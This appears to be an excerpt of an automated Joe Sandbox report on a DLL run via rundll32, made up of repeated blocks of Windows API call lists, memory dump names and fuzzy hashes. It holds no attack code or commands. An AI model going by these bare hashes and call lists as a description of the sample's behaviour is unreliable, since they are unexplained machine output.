                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                    • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                    • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                    • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                    • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                    • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                    • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                    • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2459298410-0
                                                                                                                    • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                    • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                    • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                    • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 365290523-0
                                                                                                                    • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                    • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                    • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                    • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$DesktopVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1055025324-0
                                                                                                                    • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                    • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                    • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                    • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 1002C6E7
                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                    • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 26245289-0
                                                                                                                    • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                    • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                    • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                    • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                    • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                    • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                    • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                    • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                    • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                    • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetDC.USER32(?), ref: 1002658E
                                                                                                                    • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                    • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3511876931-0
                                                                                                                    • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                    • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                    • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                    • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __msize_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1288803200-0
                                                                                                                    • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                    • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                    • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                    • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePeek$H_prolog3
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3998274959-0
                                                                                                                    • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                    • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                    • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                    • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                      • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                      • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                    • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1532457625-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                      • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                    • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                    • _strtol.LIBCMT ref: 10022CB5
                                                                                                                    • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                      • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4211061542-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ArrayDestroyFreeSafeTask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253174383-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2161412305-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                    • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1615547351-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1078018258-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                      • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                    • __strdup.LIBCMT ref: 1001514C
                                                                                                                    • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4206445780-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                    • _swprintf.LIBCMT ref: 10017768
                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210924919-0
                                                                                                                    • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                    • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                    • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                    • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1078018258-0
                                                                                                                    • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                    • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                    • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                    • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3354205298-0
                                                                                                                    • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                    • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                    • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                    • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
